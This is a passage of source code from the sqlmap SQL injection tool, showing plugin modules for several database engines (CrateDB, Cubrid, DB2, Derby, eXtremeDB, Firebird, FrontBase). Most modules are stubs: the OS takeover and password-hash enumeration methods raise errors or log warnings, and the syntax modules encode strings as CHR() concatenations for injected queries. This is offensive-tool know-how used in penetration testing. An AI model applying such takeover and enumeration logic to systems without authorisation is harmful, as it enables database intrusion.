14 | raise SqlmapUnsupportedFeatureException(errMsg)
15 |
16 | def osShell(self):
17 | errMsg = "on ClickHouse it is not possible to execute commands"
18 | raise SqlmapUnsupportedFeatureException(errMsg)
19 |
20 | def osPwn(self):
21 | errMsg = "on ClickHouse it is not possible to establish an "
22 | errMsg += "out-of-band connection"
23 | raise SqlmapUnsupportedFeatureException(errMsg)
24 |
25 | def osSmb(self):
26 | errMsg = "on ClickHouse it is not possible to establish an "
27 | errMsg += "out-of-band connection"
28 | raise SqlmapUnsupportedFeatureException(errMsg)
29 |
--------------------------------------------------------------------------------
/plugins/dbms/cratedb/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.enums import DBMS
9 | from lib.core.settings import CRATEDB_SYSTEM_DBS
10 | from lib.core.unescaper import unescaper
11 |
12 | from plugins.dbms.cratedb.enumeration import Enumeration
13 | from plugins.dbms.cratedb.filesystem import Filesystem
14 | from plugins.dbms.cratedb.fingerprint import Fingerprint
15 | from plugins.dbms.cratedb.syntax import Syntax
16 | from plugins.dbms.cratedb.takeover import Takeover
17 | from plugins.generic.misc import Miscellaneous
18 |
19 | class CrateDBMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover):
20 | """
21 | This class defines CrateDB methods
22 | """
23 |
24 | def __init__(self):
25 | self.excludeDbsList = CRATEDB_SYSTEM_DBS
26 |
27 | for cls in self.__class__.__bases__:
28 | cls.__init__(self)
29 |
30 | unescaper[DBMS.CRATEDB] = Syntax.escape
31 |
--------------------------------------------------------------------------------
/plugins/dbms/cratedb/enumeration.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.data import logger
9 | from plugins.generic.enumeration import Enumeration as GenericEnumeration
10 |
11 | class Enumeration(GenericEnumeration):
12 | def getPasswordHashes(self):
13 | warnMsg = "on CrateDB it is not possible to enumerate the user password hashes"
14 | logger.warning(warnMsg)
15 |
16 | return {}
17 |
18 | def getRoles(self, *args, **kwargs):
19 | warnMsg = "on CrateDB it is not possible to enumerate the user roles"
20 | logger.warning(warnMsg)
21 |
22 | return {}
23 |
--------------------------------------------------------------------------------
/plugins/dbms/cratedb/filesystem.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from plugins.generic.filesystem import Filesystem as GenericFilesystem
9 |
10 | class Filesystem(GenericFilesystem):
11 | pass
12 |
--------------------------------------------------------------------------------
/plugins/dbms/cratedb/syntax.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from plugins.generic.syntax import Syntax as GenericSyntax
9 |
10 | class Syntax(GenericSyntax):
11 | @staticmethod
12 | def escape(expression, quote=True):
13 | """
14 | >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") == "SELECT 'abcdefgh' FROM foobar"
15 | True
16 | """
17 |
18 | return expression
19 |
--------------------------------------------------------------------------------
/plugins/dbms/cratedb/takeover.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.exception import SqlmapUnsupportedFeatureException
9 | from plugins.generic.takeover import Takeover as GenericTakeover
10 |
11 | class Takeover(GenericTakeover):
12 | def osCmd(self):
13 | errMsg = "on CrateDB it is not possible to execute commands"
14 | raise SqlmapUnsupportedFeatureException(errMsg)
15 |
16 | def osShell(self):
17 | errMsg = "on CrateDB it is not possible to execute commands"
18 | raise SqlmapUnsupportedFeatureException(errMsg)
19 |
20 | def osPwn(self):
21 | errMsg = "on CrateDB it is not possible to establish an "
22 | errMsg += "out-of-band connection"
23 | raise SqlmapUnsupportedFeatureException(errMsg)
24 |
25 | def osSmb(self):
26 | errMsg = "on CrateDB it is not possible to establish an "
27 | errMsg += "out-of-band connection"
28 | raise SqlmapUnsupportedFeatureException(errMsg)
29 |
--------------------------------------------------------------------------------
/plugins/dbms/cubrid/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.enums import DBMS
9 | from lib.core.settings import CUBRID_SYSTEM_DBS
10 | from lib.core.unescaper import unescaper
11 |
12 | from plugins.dbms.cubrid.enumeration import Enumeration
13 | from plugins.dbms.cubrid.filesystem import Filesystem
14 | from plugins.dbms.cubrid.fingerprint import Fingerprint
15 | from plugins.dbms.cubrid.syntax import Syntax
16 | from plugins.dbms.cubrid.takeover import Takeover
17 | from plugins.generic.misc import Miscellaneous
18 |
19 | class CubridMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover):
20 | """
21 | This class defines Cubrid methods
22 | """
23 |
24 | def __init__(self):
25 | self.excludeDbsList = CUBRID_SYSTEM_DBS
26 |
27 | for cls in self.__class__.__bases__:
28 | cls.__init__(self)
29 |
30 | unescaper[DBMS.CUBRID] = Syntax.escape
31 |
--------------------------------------------------------------------------------
/plugins/dbms/cubrid/enumeration.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.data import logger
9 | from plugins.generic.enumeration import Enumeration as GenericEnumeration
10 |
11 | class Enumeration(GenericEnumeration):
12 | def getPasswordHashes(self):
13 | warnMsg = "on Cubrid it is not possible to enumerate password hashes"
14 | logger.warning(warnMsg)
15 |
16 | return {}
17 |
18 | def getStatements(self):
19 | warnMsg = "on Cubrid it is not possible to enumerate the SQL statements"
20 | logger.warning(warnMsg)
21 |
22 | return []
23 |
24 | def getRoles(self, *args, **kwargs):
25 | warnMsg = "on Cubrid it is not possible to enumerate the user roles"
26 | logger.warning(warnMsg)
27 |
28 | return {}
29 |
30 | def getHostname(self):
31 | warnMsg = "on Cubrid it is not possible to enumerate the hostname"
32 | logger.warning(warnMsg)
33 |
--------------------------------------------------------------------------------
/plugins/dbms/cubrid/filesystem.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from plugins.generic.filesystem import Filesystem as GenericFilesystem
9 |
10 | class Filesystem(GenericFilesystem):
11 | pass
12 |
--------------------------------------------------------------------------------
/plugins/dbms/cubrid/syntax.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.convert import getOrds
9 | from plugins.generic.syntax import Syntax as GenericSyntax
10 |
11 | class Syntax(GenericSyntax):
12 | @staticmethod
13 | def escape(expression, quote=True):
14 | """
15 | >>> from lib.core.common import Backend
16 | >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") == "SELECT CHR(97)||CHR(98)||CHR(99)||CHR(100)||CHR(101)||CHR(102)||CHR(103)||CHR(104) FROM foobar"
17 | True
18 | """
19 |
20 | def escaper(value):
21 | return "||".join("CHR(%d)" % _ for _ in getOrds(value))
22 |
23 | return Syntax._escape(expression, quote, escaper)
24 |
--------------------------------------------------------------------------------
/plugins/dbms/cubrid/takeover.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.exception import SqlmapUnsupportedFeatureException
9 | from plugins.generic.takeover import Takeover as GenericTakeover
10 |
11 | class Takeover(GenericTakeover):
12 | def osCmd(self):
13 | errMsg = "on Cubrid it is not possible to execute commands"
14 | raise SqlmapUnsupportedFeatureException(errMsg)
15 |
16 | def osShell(self):
17 | errMsg = "on Cubrid it is not possible to execute commands"
18 | raise SqlmapUnsupportedFeatureException(errMsg)
19 |
20 | def osPwn(self):
21 | errMsg = "on Cubrid it is not possible to establish an "
22 | errMsg += "out-of-band connection"
23 | raise SqlmapUnsupportedFeatureException(errMsg)
24 |
25 | def osSmb(self):
26 | errMsg = "on Cubrid it is not possible to establish an "
27 | errMsg += "out-of-band connection"
28 | raise SqlmapUnsupportedFeatureException(errMsg)
29 |
--------------------------------------------------------------------------------
/plugins/dbms/db2/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.enums import DBMS
9 | from lib.core.settings import DB2_SYSTEM_DBS
10 | from lib.core.unescaper import unescaper
11 |
12 | from plugins.dbms.db2.enumeration import Enumeration
13 | from plugins.dbms.db2.filesystem import Filesystem
14 | from plugins.dbms.db2.fingerprint import Fingerprint
15 | from plugins.dbms.db2.syntax import Syntax
16 | from plugins.dbms.db2.takeover import Takeover
17 | from plugins.generic.misc import Miscellaneous
18 |
19 | class DB2Map(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover):
20 | """
21 | This class defines DB2 methods
22 | """
23 |
24 | def __init__(self):
25 | self.excludeDbsList = DB2_SYSTEM_DBS
26 |
27 | for cls in self.__class__.__bases__:
28 | cls.__init__(self)
29 |
30 | unescaper[DBMS.DB2] = Syntax.escape
31 |
--------------------------------------------------------------------------------
/plugins/dbms/db2/enumeration.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.data import logger
9 | from plugins.generic.enumeration import Enumeration as GenericEnumeration
10 |
11 | class Enumeration(GenericEnumeration):
12 | def getPasswordHashes(self):
13 | warnMsg = "on IBM DB2 it is not possible to enumerate password hashes"
14 | logger.warning(warnMsg)
15 |
16 | return {}
17 |
18 | def getStatements(self):
19 | warnMsg = "on IBM DB2 it is not possible to enumerate the SQL statements"
20 | logger.warning(warnMsg)
21 |
22 | return []
23 |
--------------------------------------------------------------------------------
/plugins/dbms/db2/filesystem.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from plugins.generic.filesystem import Filesystem as GenericFilesystem
9 |
10 | class Filesystem(GenericFilesystem):
11 | pass
12 |
--------------------------------------------------------------------------------
/plugins/dbms/db2/syntax.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.convert import getOrds
9 | from plugins.generic.syntax import Syntax as GenericSyntax
10 |
11 | class Syntax(GenericSyntax):
12 | @staticmethod
13 | def escape(expression, quote=True):
14 | """
15 | >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") == "SELECT CHR(97)||CHR(98)||CHR(99)||CHR(100)||CHR(101)||CHR(102)||CHR(103)||CHR(104) FROM foobar"
16 | True
17 | """
18 |
19 | def escaper(value):
20 | return "||".join("CHR(%d)" % _ for _ in getOrds(value))
21 |
22 | return Syntax._escape(expression, quote, escaper)
23 |
--------------------------------------------------------------------------------
/plugins/dbms/db2/takeover.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from plugins.generic.takeover import Takeover as GenericTakeover
9 |
10 | class Takeover(GenericTakeover):
11 | def __init__(self):
12 | self.__basedir = None
13 | self.__datadir = None
14 |
15 | GenericTakeover.__init__(self)
16 |
--------------------------------------------------------------------------------
/plugins/dbms/derby/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.enums import DBMS
9 | from lib.core.settings import DERBY_SYSTEM_DBS
10 | from lib.core.unescaper import unescaper
11 |
12 | from plugins.dbms.derby.enumeration import Enumeration
13 | from plugins.dbms.derby.filesystem import Filesystem
14 | from plugins.dbms.derby.fingerprint import Fingerprint
15 | from plugins.dbms.derby.syntax import Syntax
16 | from plugins.dbms.derby.takeover import Takeover
17 | from plugins.generic.misc import Miscellaneous
18 |
19 | class DerbyMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover):
20 | """
21 | This class defines Apache Derby methods
22 | """
23 |
24 | def __init__(self):
25 | self.excludeDbsList = DERBY_SYSTEM_DBS
26 |
27 | for cls in self.__class__.__bases__:
28 | cls.__init__(self)
29 |
30 | unescaper[DBMS.DERBY] = Syntax.escape
31 |
--------------------------------------------------------------------------------
/plugins/dbms/derby/filesystem.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from plugins.generic.filesystem import Filesystem as GenericFilesystem
9 |
10 | class Filesystem(GenericFilesystem):
11 | pass
12 |
--------------------------------------------------------------------------------
/plugins/dbms/derby/syntax.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from plugins.generic.syntax import Syntax as GenericSyntax
9 |
10 | class Syntax(GenericSyntax):
11 | @staticmethod
12 | def escape(expression, quote=True):
13 | """
14 | >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") == "SELECT 'abcdefgh' FROM foobar"
15 | True
16 | """
17 |
18 | return expression
19 |
--------------------------------------------------------------------------------
/plugins/dbms/derby/takeover.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.exception import SqlmapUnsupportedFeatureException
9 | from plugins.generic.takeover import Takeover as GenericTakeover
10 |
11 | class Takeover(GenericTakeover):
12 | def osCmd(self):
13 | errMsg = "on Apache Derby it is not possible to execute commands"
14 | raise SqlmapUnsupportedFeatureException(errMsg)
15 |
16 | def osShell(self):
17 | errMsg = "on Apache Derby it is not possible to execute commands"
18 | raise SqlmapUnsupportedFeatureException(errMsg)
19 |
20 | def osPwn(self):
21 | errMsg = "on Apache Derby it is not possible to establish an "
22 | errMsg += "out-of-band connection"
23 | raise SqlmapUnsupportedFeatureException(errMsg)
24 |
25 | def osSmb(self):
26 | errMsg = "on Apache Derby it is not possible to establish an "
27 | errMsg += "out-of-band connection"
28 | raise SqlmapUnsupportedFeatureException(errMsg)
29 |
--------------------------------------------------------------------------------
/plugins/dbms/extremedb/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.enums import DBMS
9 | from lib.core.settings import EXTREMEDB_SYSTEM_DBS
10 | from lib.core.unescaper import unescaper
11 | from plugins.dbms.extremedb.enumeration import Enumeration
12 | from plugins.dbms.extremedb.filesystem import Filesystem
13 | from plugins.dbms.extremedb.fingerprint import Fingerprint
14 | from plugins.dbms.extremedb.syntax import Syntax
15 | from plugins.dbms.extremedb.takeover import Takeover
16 | from plugins.generic.misc import Miscellaneous
17 |
18 | class ExtremeDBMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover):
19 | """
20 | This class defines eXtremeDB methods
21 | """
22 |
23 | def __init__(self):
24 | self.excludeDbsList = EXTREMEDB_SYSTEM_DBS
25 |
26 | for cls in self.__class__.__bases__:
27 | cls.__init__(self)
28 |
29 | unescaper[DBMS.EXTREMEDB] = Syntax.escape
30 |
--------------------------------------------------------------------------------
/plugins/dbms/extremedb/connector.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.exception import SqlmapUnsupportedFeatureException
9 | from plugins.generic.connector import Connector as GenericConnector
10 |
11 | class Connector(GenericConnector):
12 | def connect(self):
13 | errMsg = "on eXtremeDB it is not (currently) possible to establish a "
14 | errMsg += "direct connection"
15 | raise SqlmapUnsupportedFeatureException(errMsg)
16 |
--------------------------------------------------------------------------------
/plugins/dbms/extremedb/filesystem.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.exception import SqlmapUnsupportedFeatureException
9 | from plugins.generic.filesystem import Filesystem as GenericFilesystem
10 |
11 | class Filesystem(GenericFilesystem):
12 | def readFile(self, remoteFile):
13 | errMsg = "on eXtremeDB it is not possible to read files"
14 | raise SqlmapUnsupportedFeatureException(errMsg)
15 |
16 | def writeFile(self, localFile, remoteFile, fileType=None, forceCheck=False):
17 | errMsg = "on eXtremeDB it is not possible to write files"
18 | raise SqlmapUnsupportedFeatureException(errMsg)
19 |
--------------------------------------------------------------------------------
/plugins/dbms/extremedb/syntax.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from plugins.generic.syntax import Syntax as GenericSyntax
9 |
10 | class Syntax(GenericSyntax):
11 | @staticmethod
12 | def escape(expression, quote=True):
13 | """
14 | >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") == "SELECT 'abcdefgh' FROM foobar"
15 | True
16 | """
17 |
18 | return expression
19 |
--------------------------------------------------------------------------------
/plugins/dbms/extremedb/takeover.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.exception import SqlmapUnsupportedFeatureException
9 | from plugins.generic.takeover import Takeover as GenericTakeover
10 |
11 | class Takeover(GenericTakeover):
12 | def osCmd(self):
13 | errMsg = "on eXtremeDB it is not possible to execute commands"
14 | raise SqlmapUnsupportedFeatureException(errMsg)
15 |
16 | def osShell(self):
17 | errMsg = "on eXtremeDB it is not possible to execute commands"
18 | raise SqlmapUnsupportedFeatureException(errMsg)
19 |
20 | def osPwn(self):
21 | errMsg = "on eXtremeDB it is not possible to establish an "
22 | errMsg += "out-of-band connection"
23 | raise SqlmapUnsupportedFeatureException(errMsg)
24 |
25 | def osSmb(self):
26 | errMsg = "on eXtremeDB it is not possible to establish an "
27 | errMsg += "out-of-band connection"
28 | raise SqlmapUnsupportedFeatureException(errMsg)
29 |
--------------------------------------------------------------------------------
/plugins/dbms/firebird/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.enums import DBMS
9 | from lib.core.settings import FIREBIRD_SYSTEM_DBS
10 | from lib.core.unescaper import unescaper
11 | from plugins.dbms.firebird.enumeration import Enumeration
12 | from plugins.dbms.firebird.filesystem import Filesystem
13 | from plugins.dbms.firebird.fingerprint import Fingerprint
14 | from plugins.dbms.firebird.syntax import Syntax
15 | from plugins.dbms.firebird.takeover import Takeover
16 | from plugins.generic.misc import Miscellaneous
17 |
18 | class FirebirdMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover):
19 | """
20 | This class defines Firebird methods
21 | """
22 |
23 | def __init__(self):
24 | self.excludeDbsList = FIREBIRD_SYSTEM_DBS
25 |
26 | for cls in self.__class__.__bases__:
27 | cls.__init__(self)
28 |
29 | unescaper[DBMS.FIREBIRD] = Syntax.escape
30 |
--------------------------------------------------------------------------------
/plugins/dbms/firebird/enumeration.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.data import logger
9 | from plugins.generic.enumeration import Enumeration as GenericEnumeration
10 |
11 | class Enumeration(GenericEnumeration):
12 | def getDbs(self):
13 | warnMsg = "on Firebird it is not possible to enumerate databases (use only '--tables')"
14 | logger.warning(warnMsg)
15 |
16 | return []
17 |
18 | def getPasswordHashes(self):
19 | warnMsg = "on Firebird it is not possible to enumerate the user password hashes"
20 | logger.warning(warnMsg)
21 |
22 | return {}
23 |
24 | def searchDb(self):
25 | warnMsg = "on Firebird it is not possible to search databases"
26 | logger.warning(warnMsg)
27 |
28 | return []
29 |
30 | def getHostname(self):
31 | warnMsg = "on Firebird it is not possible to enumerate the hostname"
32 | logger.warning(warnMsg)
33 |
34 | def getStatements(self):
35 | warnMsg = "on Firebird it is not possible to enumerate the SQL statements"
36 | logger.warning(warnMsg)
37 |
38 | return []
39 |
--------------------------------------------------------------------------------
/plugins/dbms/firebird/filesystem.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.exception import SqlmapUnsupportedFeatureException
9 | from plugins.generic.filesystem import Filesystem as GenericFilesystem
10 |
11 | class Filesystem(GenericFilesystem):
12 | def readFile(self, remoteFile):
13 | errMsg = "on Firebird it is not possible to read files"
14 | raise SqlmapUnsupportedFeatureException(errMsg)
15 |
16 | def writeFile(self, localFile, remoteFile, fileType=None, forceCheck=False):
17 | errMsg = "on Firebird it is not possible to write files"
18 | raise SqlmapUnsupportedFeatureException(errMsg)
19 |
--------------------------------------------------------------------------------
/plugins/dbms/firebird/syntax.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.common import isDBMSVersionAtLeast
9 | from lib.core.convert import getOrds
10 | from plugins.generic.syntax import Syntax as GenericSyntax
11 |
12 | class Syntax(GenericSyntax):
13 | @staticmethod
14 | def escape(expression, quote=True):
15 | """
16 | >>> from lib.core.common import Backend
17 | >>> Backend.setVersion('2.0')
18 | ['2.0']
19 | >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") == "SELECT 'abcdefgh' FROM foobar"
20 | True
21 | >>> Backend.setVersion('2.1')
22 | ['2.1']
23 | >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") == "SELECT ASCII_CHAR(97)||ASCII_CHAR(98)||ASCII_CHAR(99)||ASCII_CHAR(100)||ASCII_CHAR(101)||ASCII_CHAR(102)||ASCII_CHAR(103)||ASCII_CHAR(104) FROM foobar"
24 | True
25 | """
26 |
27 | def escaper(value):
28 | return "||".join("ASCII_CHAR(%d)" % _ for _ in getOrds(value))
29 |
30 | retVal = expression
31 |
32 | if isDBMSVersionAtLeast("2.1"):
33 | retVal = Syntax._escape(expression, quote, escaper)
34 |
35 | return retVal
36 |
--------------------------------------------------------------------------------
/plugins/dbms/firebird/takeover.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.exception import SqlmapUnsupportedFeatureException
9 | from plugins.generic.takeover import Takeover as GenericTakeover
10 |
11 | class Takeover(GenericTakeover):
12 | def osCmd(self):
13 | errMsg = "on Firebird it is not possible to execute commands"
14 | raise SqlmapUnsupportedFeatureException(errMsg)
15 |
16 | def osShell(self):
17 | errMsg = "on Firebird it is not possible to execute commands"
18 | raise SqlmapUnsupportedFeatureException(errMsg)
19 |
20 | def osPwn(self):
21 | errMsg = "on Firebird it is not possible to establish an "
22 | errMsg += "out-of-band connection"
23 | raise SqlmapUnsupportedFeatureException(errMsg)
24 |
25 | def osSmb(self):
26 | errMsg = "on Firebird it is not possible to establish an "
27 | errMsg += "out-of-band connection"
28 | raise SqlmapUnsupportedFeatureException(errMsg)
29 |
--------------------------------------------------------------------------------
/plugins/dbms/frontbase/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.enums import DBMS
9 | from lib.core.settings import FRONTBASE_SYSTEM_DBS
10 | from lib.core.unescaper import unescaper
11 | from plugins.dbms.frontbase.enumeration import Enumeration
12 | from plugins.dbms.frontbase.filesystem import Filesystem
13 | from plugins.dbms.frontbase.fingerprint import Fingerprint
14 | from plugins.dbms.frontbase.syntax import Syntax
15 | from plugins.dbms.frontbase.takeover import Takeover
16 | from plugins.generic.misc import Miscellaneous
17 |
18 | class FrontBaseMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover):
19 | """
20 | This class defines FrontBase methods
21 | """
22 |
23 | def __init__(self):
24 | self.excludeDbsList = FRONTBASE_SYSTEM_DBS
25 |
26 | for cls in self.__class__.__bases__:
27 | cls.__init__(self)
28 |
29 | unescaper[DBMS.FRONTBASE] = Syntax.escape
30 |
--------------------------------------------------------------------------------
/plugins/dbms/frontbase/connector.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.exception import SqlmapUnsupportedFeatureException
9 | from plugins.generic.connector import Connector as GenericConnector
10 |
11 | class Connector(GenericConnector):
12 | def connect(self):
13 | errMsg = "on FrontBase it is not (currently) possible to establish a "
14 | errMsg += "direct connection"
15 | raise SqlmapUnsupportedFeatureException(errMsg)
16 |
--------------------------------------------------------------------------------
/plugins/dbms/frontbase/enumeration.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.data import logger
9 | from plugins.generic.enumeration import Enumeration as GenericEnumeration
10 |
11 | class Enumeration(GenericEnumeration):
12 | def getBanner(self):
13 | warnMsg = "on FrontBase it is not possible to get the banner"
14 | logger.warning(warnMsg)
15 |
16 | return None
17 |
18 | def getPrivileges(self, *args, **kwargs):
19 | warnMsg = "on FrontBase it is not possible to enumerate the user privileges"
20 | logger.warning(warnMsg)
21 |
22 | return {}
23 |
24 | def getHostname(self):
25 | warnMsg = "on FrontBase it is not possible to enumerate the hostname"
26 | logger.warning(warnMsg)
27 |
28 | def getStatements(self):
29 | warnMsg = "on FrontBase it is not possible to enumerate the SQL statements"
30 | logger.warning(warnMsg)
31 |
32 | return []
33 |
--------------------------------------------------------------------------------
/plugins/dbms/frontbase/filesystem.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.exception import SqlmapUnsupportedFeatureException
9 | from plugins.generic.filesystem import Filesystem as GenericFilesystem
10 |
11 | class Filesystem(GenericFilesystem):
12 | def readFile(self, remoteFile):
13 | errMsg = "on FrontBase it is not possible to read files"
14 | raise SqlmapUnsupportedFeatureException(errMsg)
15 |
16 | def writeFile(self, localFile, remoteFile, fileType=None, forceCheck=False):
17 | errMsg = "on FrontBase it is not possible to write files"
18 | raise SqlmapUnsupportedFeatureException(errMsg)
19 |
--------------------------------------------------------------------------------
/plugins/dbms/frontbase/syntax.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from plugins.generic.syntax import Syntax as GenericSyntax
9 |
10 | class Syntax(GenericSyntax):
11 | @staticmethod
12 | def escape(expression, quote=True):
13 | """
14 | >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") == "SELECT 'abcdefgh' FROM foobar"
15 | True
16 | """
17 |
18 | return expression
19 |
--------------------------------------------------------------------------------
/plugins/dbms/frontbase/takeover.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
